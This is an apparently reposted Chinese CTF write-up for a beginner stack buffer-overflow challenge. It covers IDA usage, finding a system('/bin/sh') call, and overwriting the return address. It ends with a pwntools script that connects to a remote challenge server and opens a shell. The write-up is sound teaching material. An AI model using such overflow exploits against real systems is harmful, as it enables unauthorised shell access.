PWN 是一个黑客语法的俚语词 ,是指攻破设备或者系统 。发音类似”砰”,对黑客而言,这就是成功实施黑客攻击的声音–砰的一声,被”黑”的电脑或手机就被你操纵了 。
简单点说就是利用简单逆向工程后得到代码(源码、字节码、汇编等),分析与研究代码最终发现漏洞,再通过二进制或系统调用等方式获得目标主机的shell 。(取自link)
环境准备:link
PWN入门:link
PWN入门到放弃:link
缓冲区溢出初讲:link
PWNTOOLS使用简介:link
第一步:通过file判断附件文件类型,判断是ELF文件,然后利用checksec命令查看开启了哪些保护机制,运行一下,查看程序功能(参考checksec工具使用-pwn )
运行后,就一行helloworld,没什么特殊的:
第二步:拖入IDA,观察结构
汇编代码:
F5反汇编后的代码:
函数:
IDA的快捷键 Link
a:将数据转换为字符串
f5:一键反汇编
esc:回退键,能够倒回上一部操作的视图(只有在反汇编窗口才是这个作用,如果是在其他窗口按下esc,会关闭该窗口)
shift+f12:可以打开string窗口,一键找出所有的字符串,右击setup,还能对窗口的属性进行设置
ctrl+w:保存ida数据库
ctrl+s:选择某个数据段,直接进行跳转
ctrl+鼠标滚轮:能够调节流程视图的大小
x:对着某个函数、变量按该快捷键,可以查看它的交叉引用
g:直接跳转到某个地址
n:更改变量的名称
y:更改变量的类型
/ :在反编译后伪代码的界面中写下注释
\:在反编译后伪代码的界面中隐藏/显示变量和函数的类型描述,有时候变量特别多的时候隐藏掉类型描述看起来会轻松很多
;:在反汇编后的界面中写下注释
ctrl+shift+w:拍摄IDA快照
u:undefine,取消定义函数、代码、数据的定义
第三步:查看有哪些字符串
shift + F12 打开String窗口
看到了/bin/sh,点进去发现在command中
按X查找引用,然后进入,得到:
(这里其实已经告诉你函数从400596开始)
反汇编后:
程序中的system("/bin/sh");是关键所在,system拥有系统的最高权限,啥都能干,而它和**“/bin/sh”**连在一起则可以给我们提供一个类 似 cmd 的东西,我们可以用它来进行查看/修改/操作等动作。
现在我们已经找到了一个可以获取系统权限的函数,可以自己去查询flag,我们要做的就是调用这个函数
这个时候我们就想到了刚才看着好像有点奇怪的函数:
插入一个科普:ULL代表是unsigned long long
由上图可知:buf这个数组只有0x80 的空间 ,却可以输入长度 0x200 的东西,明显会造成栈溢出
溢出后会覆盖数组后面的内容,我们只要疯狂填充,直到我们要用到的语句(该题就是把数据填充到跳转语句,然后将跳转语句中的返回地址改为system函数所在的地址即可)
那我们就看一下buf后面有什么我们可以用到的语句:
当属于数组的空间结束后(到 0x0000000000000000 时),首先,有一个 s,8 个字节长度, 其次是一个 r,重点就在这,r 中存放着的就是返回地址。即当 read 函数结束后,程序下一 步要到的地方。
那我们只要知道函数的地址就可以了
设置一下可以看到地址偏移:菜单栏:Options->General,勾选此项
可以看到函数的开始地址是400596,那么我们只要把跳转的地址改为此地址就可以执行system("/bin/sh"),进而获得shell了。
编写EXP:
1 from pwn import * #导入 pwntools 中 pwn 包的所有内容 2 r = remote("220.249.52.133","43726") # 链接服务器远程交互 3 callsystem = 0x400596 4 exp = 0x80 * "A" 5 exp += ‘\x00\x00\x00\x00\x00\x00\x00\x00‘ 6 exp += ‘\x96\x05@\x00\x00\x00\x00\x00‘ 7 r.sendline(exp) # 将shellcode (这里是exp) 发送到远程连接 8 r.interactive() # 将控制权交给用户,这样就可以使用打开的shell了
成功了!!!泪目
原文:https://www.cnblogs.com/XXX-Echoed/p/13022565.html